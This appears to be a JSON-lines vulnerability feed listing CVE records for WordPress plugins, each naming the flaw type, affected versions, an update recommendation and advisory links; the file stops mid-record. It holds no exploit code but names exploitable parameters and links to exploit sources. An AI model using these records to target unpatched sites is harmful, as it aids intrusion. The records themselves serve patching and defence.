{"CVE_ID":"CVE-2024-9206","slug":"mas-wp-job-manager-company","versionImpact":"1.0.13","versionEndExcluding":"1.0.14","description":"The MAS Companies For WP Job Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.13. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc277e7c-86ec-448f-a91e-e4d12a4b4177?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc277e7c-86ec-448f-a91e-e4d12a4b4177?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mas-wp-job-manager-company\\\/tags\\\/1.0.13\\\/templates\\\/company-dashboard.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mas-wp-job-manager-company\\\/tags\\\/1.0.13\\\/templates\\\/company-dashboard.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170459\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170459\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5082","slug":"history-log-by-click5","versionImpact":"1.0.12","versionEndExcluding":"1.0.13","description":"The History Log by click5 WordPress plugin before 1.0.13 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when using the Smash Balloon Social Photo Feed plugin alongside it.","recommendation":"Update to version 1.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13a196ba-49c7-4575-9a49-3ef9eb2348f3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13a196ba-49c7-4575-9a49-3ef9eb2348f3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13547","slug":"athemes-addons-for-elementor-lite","versionImpact":"1.0.12","versionEndExcluding":"1.0.13","description":"The aThemes Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Accordion widget in all versions up to, and including, 1.0.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230740\\\/athemes-addons-for-elementor-lite\\\/trunk\\\/inc\\\/modules\\\/widgets\\\/image-accordion\\\/class-image-accordion.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230740\\\/athemes-addons-for-elementor-lite\\\/trunk\\\/inc\\\/modules\\\/widgets\\\/image-accordion\\\/class-image-accordion.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e0f7686-1c8c-49d6-9d0b-3c8df6c24d0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e0f7686-1c8c-49d6-9d0b-3c8df6c24d0d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12467","slug":"pago-redsys-tpv-grafreak","versionImpact":"1.0.12","versionEndExcluding":"1.0.13","description":"The Pago por Redsys plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'Ds_MerchantParameters' parameter in all versions up to, and including, 1.0.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pago-redsys-tpv-grafreak\\\/tags\\\/1.0.13\\\/includes\\\/class-redsysapi.php#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pago-redsys-tpv-grafreak\\\/tags\\\/1.0.13\\\/includes\\\/class-redsysapi.php#L263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pago-redsys-tpv-grafreak\\\/tags\\\/1.0.13\\\/public\\\/partials\\\/pago-redsys-grafreak-public-display.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pago-redsys-tpv-grafreak\\\/tags\\\/1.0.13\\\/public\\\/partials\\\/pago-redsys-grafreak-public-display.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215878%40pago-redsys-tpv-grafreak&new=3215878%40pago-redsys-tpv-grafreak&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215878%40pago-redsys-tpv-grafreak&new=3215878%40pago-redsys-tpv-grafreak&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed05cd81-ca21-41de-9b02-bd84498cd74e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed05cd81-ca21-41de-9b02-bd84498cd74e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36714","slug":"brizy","versionEndExcluding":"1.0.126","description":"The Brizy plugin for WordPress is vulnerable to authorization bypass due to a incorrect capability check on the is_administrator() function in versions up to, and including, 1.0.125. This makes it possible for authenticated attackers to access and interact with available AJAX functions.","recommendation":"Update to version 1.0.126, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9495e25d-a5a6-4f25-9363-783626e58a4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9495e25d-a5a6-4f25-9363-783626e58a4a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-brizy-page-builder-plugin-fixed-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-brizy-page-builder-plugin-fixed-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13315","slug":"shopwarden","versionImpact":"1.0.11","versionEndExcluding":"1.0.12","description":"The Shopwarden \u2013 Automated WooCommerce monitoring & testing plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.11. This is due to missing or incorrect nonce validation on the save_setting() function. This makes it possible for unauthenticated attackers to update arbitrary options and achieve privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shopwarden\\\/trunk\\\/shopwarden.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shopwarden\\\/trunk\\\/shopwarden.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238978%40shopwarden&new=3238978%40shopwarden&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238978%40shopwarden&new=3238978%40shopwarden&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b11ed628-f736-4262-80a2-62b32948a3a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b11ed628-f736-4262-80a2-62b32948a3a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7239","slug":"wp-dashboard-notes","versionImpact":"1.0.10","versionEndExcluding":"1.0.11","description":"The WP Dashboard Notes WordPress plugin before 1.0.11 does not validate that the user has access to the post_id parameter in its wpdn_update_note AJAX action. This allows users with a role of contributor and above to update notes created by other users.","recommendation":"Update to version 1.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e6afe50-27f9-41fa-a94b-f44df0850e2c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e6afe50-27f9-41fa-a94b-f44df0850e2c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7198","slug":"wp-dashboard-notes","versionImpact":"1.0.10","versionEndExcluding":"1.0.11","description":"The WP Dashboard Notes WordPress plugin before 1.0.11 is vulnerable to Insecure Direct Object References (IDOR) in post_id= parameter. Authenticated users are able to delete private notes associated with different user accounts. This poses a significant security risk as it violates the principle of least privilege and compromises the integrity and privacy of user data.","recommendation":"Update to version 1.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/75fbee63-d622-441f-8675-082907b0b1e6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/75fbee63-d622-441f-8675-082907b0b1e6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2708","slug":"video-slider-with-thumbnails","versionEndExcluding":"1.0.11","description":"The Video Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018search_term\u2019 parameter in versions up to, and including, 1.0.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-slider-with-thumbnails\\\/tags\\\/1.0.11\\\/video-slider-with-thumbnails.php#L1105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-slider-with-thumbnails\\\/tags\\\/1.0.11\\\/video-slider-with-thumbnails.php#L1105\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cfbad9f-61ba-4216-9078-c1e7e809899a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cfbad9f-61ba-4216-9078-c1e7e809899a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-slider-with-thumbnails\\\/tags\\\/1.0.10\\\/video-slider-with-thumbnails.php#L1103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-slider-with-thumbnails\\\/tags\\\/1.0.10\\\/video-slider-with-thumbnails.php#L1103\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11333","slug":"hls-player","versionImpact":"1.0.10","versionEndExcluding":"1.0.11","description":"The HLS Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hls_player' shortcode in all versions up to, and including, 1.0.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197684\\\/hls-player\\\/tags\\\/1.0.11\\\/hls-player.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197684\\\/hls-player\\\/tags\\\/1.0.11\\\/hls-player.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/808695a2-4d34-4b43-88a6-7da788100f2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/808695a2-4d34-4b43-88a6-7da788100f2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0866","slug":"check-email","versionImpact":"1.0.9","versionEndExcluding":"1.0.10","description":"The Check & Log Email plugin for WordPress is vulnerable to Unauthenticated Hook Injection in all versions up to, and including, 1.0.9 via the check_nonce function. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress under certain circumstances. The action the attacker wishes to execute needs to have a nonce check, and the nonce needs to be known to the attacker. Furthermore, the absence of a capability check is a requirement.","recommendation":"Update to version 1.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3070","slug":"last-viewed-posts","versionImpact":"1.0.0","versionEndExcluding":"1.0.1","description":"The Last Viewed Posts by WPBeginner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.0 via deserialization of untrusted input from the LastViewedPosts Cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6c5cc05-b147-46f6-aaa9-4c82aae1b544?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6c5cc05-b147-46f6-aaa9-4c82aae1b544?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3062246%40last-viewed-posts&new=3062246%40last-viewed-posts&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3062246%40last-viewed-posts&new=3062246%40last-viewed-posts&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2014-125100","slug":"job-board","versionEndExcluding":"1.0.1","description":"A vulnerability classified as problematic was found in BestWebSoft Job Board Plugin 1.0.0 on WordPress. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.0.1 is able to address this issue. The name of the patch is dbb71deee071422ce3e663fbcdce3ad24886f940. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227764.","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.227764\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.227764\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227764\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227764\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/job-board\\\/commit\\\/dbb71deee071422ce3e663fbcdce3ad24886f940\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/job-board\\\/commit\\\/dbb71deee071422ce3e663fbcdce3ad24886f940\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10130","slug":"circle-image-slider-with-lightbox","versionImpact":"1.0","versionEndExcluding":"1.0.1","description":"The Team Circle Image Slider With Lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing or incorrect nonce validation on the circle_thumbnail_slider_with_lightbox_image_management_func() function. This makes it possible for unauthenticated attackers to edit image data which can be used to inject malicious JavaScript, along with deleting images, and uploading malicious files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6a54470-fc66-43c5-a523-ddbefd47ee1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6a54470-fc66-43c5-a523-ddbefd47ee1f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1269993%40circle-image-slider-with-lightbox&new=1269993%40circle-image-slider-with-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1269993%40circle-image-slider-with-lightbox&new=1269993%40circle-image-slider-with-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5821","slug":"wp-responsive-thumbnail-slider","versionImpact":"1.0","versionEndExcluding":"1.0.1","description":"The Thumbnail carousel slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing nonce validation on the deleteselected function. This makes it possible for unauthenticated attackers to delete sliders in bulk via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1263536\\\/wp-responsive-slider-with-lightbox\\\/trunk\\\/wp-responsive-slider-with-lightbox.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1263536\\\/wp-responsive-slider-with-lightbox\\\/trunk\\\/wp-responsive-slider-with-lightbox.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-thumbnail-slider\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-thumbnail-slider\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bde75c5a-b0b7-4f26-91e9-dd4816e276c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bde75c5a-b0b7-4f26-91e9-dd4816e276c9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5820","slug":"wp-responsive-slider-with-lightbox","versionImpact":"1.0","versionEndExcluding":"1.0.1","description":"The Thumbnail Slider With Lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing or incorrect nonce validation on the addedit functionality. This makes it possible for unauthenticated attackers to upload arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e51e1cd2-6de9-4820-8bba-1c6b5053e2c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e51e1cd2-6de9-4820-8bba-1c6b5053e2c1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10120","slug":"wds-multisite-aggregate","versionImpact":"1.0.0","versionEndExcluding":"1.0.1","description":"A vulnerability, which was classified as problematic, was found in WDS Multisite Aggregate Plugin up to 1.0.0 on WordPress. Affected is the function update_options of the file includes\/WDS_Multisite_Aggregate_Options.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.0.1 is able to address this issue. The name of the patch is 49e0bbcb6ff70e561365d9e0d26426598f63ca12. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-233364.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.233364\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.233364\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wds-multisite-aggregate\\\/commit\\\/49e0bbcb6ff70e561365d9e0d26426598f63ca12\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wds-multisite-aggregate\\\/commit\\\/49e0bbcb6ff70e561365d9e0d26426598f63ca12\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.233364\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.233364\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5945","slug":"wp-responsive-video-gallery-with-lightbox","versionImpact":"1.0","versionEndExcluding":"1.0.1","description":"The video carousel slider with lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing or incorrect nonce validation on the responsive_video_gallery_with_lightbox_video_management_func() function. This makes it possible for unauthenticated attackers to delete videos hosted from the video slider via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.1\\\/wp-responsive-video-gallery-with-lightbox.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-video-gallery-with-lightbox\\\/tags\\\/1.0.1\\\/wp-responsive-video-gallery-with-lightbox.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-responsive-video-gallery-with-lightbox\\\/blob\\\/master\\\/wp-responsive-video-gallery-with-lightbox.php\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wp-responsive-video-gallery-with-lightbox\\\/blob\\\/master\\\/wp-responsive-video-gallery-with-lightbox.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc052b00-65a7-4668-8bdd-b06d69d12a4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc052b00-65a7-4668-8bdd-b06d69d12a4a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10144","slug":"wp-responsive-thumbnail-slider","versionEndExcluding":"1.0.1","description":"The Responsive Thumbnail Slider plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type sanitization in the via the image uploader in versions up to 1.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected sites server using a double extension which may make remote code execution possible.","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/cxsecurity.com\\\/issue\\\/WLB-2015080170\",\"name\":\"https:\\\/\\\/cxsecurity.com\\\/issue\\\/WLB-2015080170\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_responsive_thumbnail_slider_upload.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/multi\\\/http\\\/wp_responsive_thumbnail_slider_upload.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-thumbnail-carousel-slider-arbitrary-file-upload-1-0\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-thumbnail-carousel-slider-arbitrary-file-upload-1-0\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/37998\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/37998\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c396ae6-d34c-4554-b670-28868dc136a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c396ae6-d34c-4554-b670-28868dc136a5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3135","slug":"mailtree-log-mail","versionEndExcluding":"1.0.1","description":"The Mailtree Log Mail plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24d0229c-0f1b-42df-b89a-ce0b8a3fda7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24d0229c-0f1b-42df-b89a-ce0b8a3fda7e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2928716\\\/mailtree-log-mail\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2928716\\\/mailtree-log-mail\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6384","slug":"wp-user-profile-avatar","versionImpact":"1.0.0","versionEndExcluding":"1.0.1","description":"The WP User Profile Avatar WordPress plugin before 1.0.1 does not properly check for authorisation, allowing authors to delete and update arbitrary avatar","recommendation":"Update to version 1.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbdefab4-614b-493b-a9ae-c5aeff8323ef\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbdefab4-614b-493b-a9ae-c5aeff8323ef\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51700","slug":"WP-Mobile-BankID-Integration","versionEndExcluding":"1.0.1","description":"Unofficial Mobile BankID Integration for WordPress lets users employ Mobile BankID to authenticate themselves on your WordPress site. Prior to 1.0.1, WP-Mobile-BankID-Integration is affected by a vulnerability classified as a Deserialization of Untrusted Data vulnerability, specifically impacting scenarios where an attacker can manipulate the database. If unauthorized actors gain access to the database, they could exploit this vulnerability to execute object injection attacks. This could lead to unauthorized code execution, data manipulation, or data exfiltration within the WordPress environment.  Users of the plugin should upgrade to version 1.0.1 (or later), where the serialization and deserialization of OrderResponse objects have been switched out to an array stored as JSON.  A possible workaround for users unable to upgrade immediately is to enforce stricter access controls on the database, ensuring that only trusted and authorized entities can modify data. Additionally, implementing monitoring tools to detect unusual database activities could help identify and mitigate potential exploitation attempts.\n","recommendation":"Update to version 1.0.1, or a newer patched 